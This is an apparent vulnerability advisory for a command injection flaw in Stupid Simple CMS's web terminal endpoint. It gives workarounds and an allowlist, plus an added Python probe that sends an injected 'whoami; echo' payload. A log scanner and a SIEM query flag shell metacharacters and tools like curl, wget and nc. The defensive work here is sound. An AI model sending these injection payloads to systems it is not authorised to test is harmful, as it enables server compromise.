CVE-2023-6901

7.3 HIGH

📋 TL;DR

This is an OS command injection vulnerability in codelyfe Stupid Simple CMS that lets a remote, unauthenticated attacker execute arbitrary commands on the server as the web server user. It is triggered by a crafted HTTP POST to the /terminal/handle-command.php endpoint whose `command` parameter carries attacker-controlled shell input. All installations of Stupid Simple CMS up to and including version 1.2.3 are affected.

💻 Affected Systems

Products:
  • codelyfe Stupid Simple CMS
Versions: up to and including 1.2.3
Operating Systems: All operating systems running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: The endpoint ships with the default installation; any deployment where /terminal/handle-command.php is reachable over HTTP is affected, with no configuration change needed to expose it.

📦 What is this software?

Stupid Simple CMS is a small PHP content management system published by codelyfe. The affected endpoint sits under its /terminal/ directory and accepts a `command` parameter, which indicates a browser-based terminal feature that runs commands on the hosting server; that feature is what the injection abuses.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Arbitrary command execution as the web server user, escalating to full compromise of the host: theft of the site database and configuration secrets, ransomware deployment, or a persistent backdoor. If the web server or PHP process runs with elevated privileges, the attacker inherits them directly.

🟠

Likely Case

Attackers gain shell access to the server, allowing them to read sensitive files, modify website content, or use the server as a pivot point for further attacks.

🟢

If Mitigated

The request is rejected at the network perimeter or by a web application firewall, so no command runs. The blocked attempts still appear in logs, and the responses still tell the attacker that the endpoint exists.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable via HTTP POST requests without authentication, making internet-facing instances extremely vulnerable.
🏢 Internal Only: HIGH - Internal instances are just as exploitable by anyone who can reach the web interface, authenticated or not, including malware on a workstation in the same network.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The public proof-of-concept exploits the flaw with a single curl command; no authentication, session, or special server condition is required.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No vendor fix is known for this issue. If a release later than 1.2.3 becomes available, upgrade and re-test the endpoint; otherwise apply the workarounds below. Because a web-reachable command runner is a design risk in itself, also weigh replacing the CMS.

🔧 Temporary Workarounds

Block vulnerable endpoint

Operating Systems: all

Restrict access to /terminal/handle-command.php using web server configuration or firewall rules

# Apache 2.4: add to .htaccess in the /terminal/ directory or to the virtual host config
# (.htaccess only works if AllowOverride permits it; this is mod_authz_core syntax)
<Files "handle-command.php">
    Require all denied
</Files>
# Apache 2.2, or 2.4 with mod_access_compat loaded, uses the legacy syntax instead:
#   Order deny,allow
#   Deny from all
# Nginx: add to the server block ABOVE the generic "location ~ \.php$" block;
# regex locations are tried in order and the first match wins
location ~ ^/terminal/handle-command\.php$ {
    deny all;   # already answers 403, so no separate "return 403" is needed
}

Input validation and sanitization

Operating Systems: all

Accept only an exact, fixed set of whole command strings for the 'command' parameter. Do not try to strip or blacklist metacharacters: quoting, encoding and newline tricks routinely bypass such filters. If the web terminal feature is not needed, deleting the /terminal/ directory altogether is simpler and more robust than any validation.

// Example PHP code to add at the top of handle-command.php, before the
// value of $_POST['command'] reaches shell_exec()/system()/exec()
$allowed_commands = ['ls', 'pwd', 'whoami'];
$command = $_POST['command'] ?? '';   // avoid an undefined-index notice on an empty POST
// Strict, whole-string match: 'ls -la' and 'ls; id' are both rejected, so no
// shell metacharacters can ever reach the shell
if (!in_array($command, $allowed_commands, true)) {
    http_response_code(400);
    die('Invalid command');
}

🧯 If You Can't Patch

  • Put a web application firewall with OS command injection rules in front of the CMS; treat it as a stopgap, since WAF signatures are bypassable
  • Segment the network so the CMS host cannot reach databases, file shares or management interfaces it does not need
  • If the terminal feature is not required, list system, exec, shell_exec, passthru, popen and proc_open in disable_functions in php.ini; this breaks the terminal by design and removes the primitive the injection depends on

🔍 How to Verify

Check if Vulnerable:

On a system you own or are authorised to test, send a POST request to /terminal/handle-command.php with a command parameter such as 'whoami; id'. If the response contains the command output (a username and uid/gid line), the instance executes injected commands.

Check Version:

Check the version shown in the admin panel, or look for a version or changelog file in the installation directory; anything up to and including 1.2.3 is affected.

Verify Fix Applied:

Repeat the same request after applying the workarounds: the web server rule should answer with HTTP 403, and the allowlist should return the validation error instead of command output. Any response that still contains command output means the mitigation is not in effect (for example, the Nginx location is shadowed by a generic PHP block).
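Below is an added Python probe that automates this before/after check on a host you are authorised to test. It is not code from the CVE entry, the public PoC, or Stupid Simple CMS. It takes the parameter name `command` and the `;` chaining from the 'whoami; id' probe above, and assumes (not stated on this page) that the endpoint returns command output in the HTTP response body; it tags the probe with a random nonce so a hit is proven by the nonce echoing back rather than by guessing at output formatting.

```python
"""Probe /terminal/handle-command.php and classify the result as blocked,
rejected, vulnerable or absent. Added example; not from the CVE entry or the CMS."""
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT_PATH = "/terminal/handle-command.php"


def build_probe(base_url, nonce):
    """Return (url, urlencoded POST body).

    The probe chains a harmless `echo` of a random nonce after `whoami` with `;`.
    Assumption: the parameter is named `command` and command output comes back
    in the response body."""
    url = base_url.rstrip("/") + ENDPOINT_PATH
    body = urllib.parse.urlencode({"command": f"whoami; echo {nonce}"}).encode()
    return url, body


def classify(status, body, nonce):
    """Interpret one probe result; the nonce check avoids false positives
    from pages that merely reflect the submitted text."""
    if status == 403:
        return "blocked"        # web-server deny rule in place
    if status == 404:
        return "absent"         # endpoint removed
    if status == 200 and nonce in body:
        return "vulnerable"     # the shell actually ran our echo
    if status == 200:
        return "rejected"       # endpoint answered but did not execute (e.g. allowlist)
    return "inconclusive"


def probe(base_url, timeout=10.0):
    """Send the probe to a host you are authorised to test and classify the outcome."""
    nonce = secrets.token_hex(8)
    url, body = build_probe(base_url, nonce)
    req = urllib.request.Request(url, data=body, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode(errors="replace"), nonce)
    except urllib.error.HTTPError as e:
        # 403/404 arrive here; classify them the same way
        return classify(e.code, e.read().decode(errors="replace"), nonce)


if __name__ == "__main__":
    # usage: python probe.py https://cms.example.test
    print(probe(sys.argv[1]))
```

Run it once before and once after applying a workaround; the expected transition is "vulnerable" to "blocked" (web server rule) or "rejected" (allowlist).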

📡 Detection & Monitoring

Log Indicators:

  • Any served (non-403) request to /terminal/handle-command.php; once the workaround is in place the endpoint should never answer 200. A `command` parameter containing shell metacharacters (;, |, &, $, backtick, newline) is only visible if request-body logging is enabled, since stock Apache/Nginx access logs record just the request line
  • Shell or child processes (sh, bash, curl, wget, nc, python) spawned by the web server or PHP-FPM user, seen in auditd execve records or EDR process telemetry rather than in web server logs
  • Repeated 403 or 404 responses for the endpoint from a single source, indicating scanning for the flaw

Network Indicators:

  • HTTP POST requests to /terminal/handle-command.php with command parameter containing shell commands
  • Unusual outbound connections from the web server to command-and-control or payload download hosts shortly after such a request

SIEM Query:

source="web_server" AND (url="/terminal/handle-command.php" OR command="*;*" OR command="*|*" OR command="*&*")

The `command` field only exists if the POST body is parsed into the event (WAF audit log, request-body logging, or application logging); with plain access logs, match on the URL alone and treat every hit as worth triage.
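The same detection logic as an added, offline Python scanner (not from the CVE entry or the CMS), run over constructed sample log lines. It assumes the Apache/Nginx "combined" format with one extra trailing quoted field holding the raw POST body (for Nginx, append `$request_body` to the `log_format`); without that field the metacharacter rule cannot fire and only the URL rule applies.

```python
"""Scan access logs for CVE-2023-6901 exploitation attempts.
Added example; not from the CVE entry or Stupid Simple CMS."""
import re
from collections import Counter
from urllib.parse import parse_qs

ENDPOINT = "/terminal/handle-command.php"
META = re.compile(r"[;|&$`\n]")          # shell metacharacters that chain commands

# "combined" format plus an optional trailing quoted request body (assumed format)
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"(?: "(?P<body>[^"]*)")?$'
)

# Constructed sample lines for this example, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "POST /terminal/handle-command.php HTTP/1.1" 200 64 "-" "curl/8.4.0" "command=whoami%3B+id"
203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "POST /terminal/handle-command.php HTTP/1.1" 200 40 "-" "curl/8.4.0" "command=ls"
198.51.100.2 - - [10/Jan/2024:10:01:00 +0000] "POST /terminal/handle-command.php HTTP/1.1" 403 199 "-" "python-requests/2.31" "command=id"
198.51.100.2 - - [10/Jan/2024:10:01:01 +0000] "POST /terminal/handle-command.php HTTP/1.1" 403 199 "-" "python-requests/2.31" "command=id"
198.51.100.2 - - [10/Jan/2024:10:01:02 +0000] "POST /terminal/handle-command.php HTTP/1.1" 403 199 "-" "python-requests/2.31" "command=id"
"""


def command_from_body(body):
    """Extract the decoded `command` parameter from a urlencoded body, or None."""
    if not body:
        return None
    values = parse_qs(body, keep_blank_values=True).get("command")
    return values[0] if values else None


def scan(log_text, scan_threshold=3):
    """Return a list of (severity, ip, reason) findings."""
    findings = []
    blocked = Counter()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m or m["path"].split("?")[0] != ENDPOINT:
            continue
        ip, status = m["ip"], int(m["status"])
        if status == 403:
            blocked[ip] += 1          # workaround did its job; count for scan detection
            continue
        cmd = command_from_body(m["body"])
        if cmd is not None and META.search(cmd):
            findings.append(("high", ip, f"command injection chars in {cmd!r}"))
        else:
            # Any served request to the web terminal deserves a look: with the
            # workaround in place it should never return 200.
            findings.append(("medium", ip, f"{m['method']} {ENDPOINT} served with {status}"))
    for ip, n in blocked.items():
        if n >= scan_threshold:
            findings.append(("low", ip, f"{n} blocked attempts on {ENDPOINT}"))
    return findings


if __name__ == "__main__":
    for sev, ip, why in scan(SAMPLE_LOG):
        print(f"[{sev}] {ip}: {why}")
```

On the sample lines this yields one high finding (the `whoami; id` body), one medium finding (a served plain `ls`), and one low finding for the source that hit the blocked endpoint three times.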
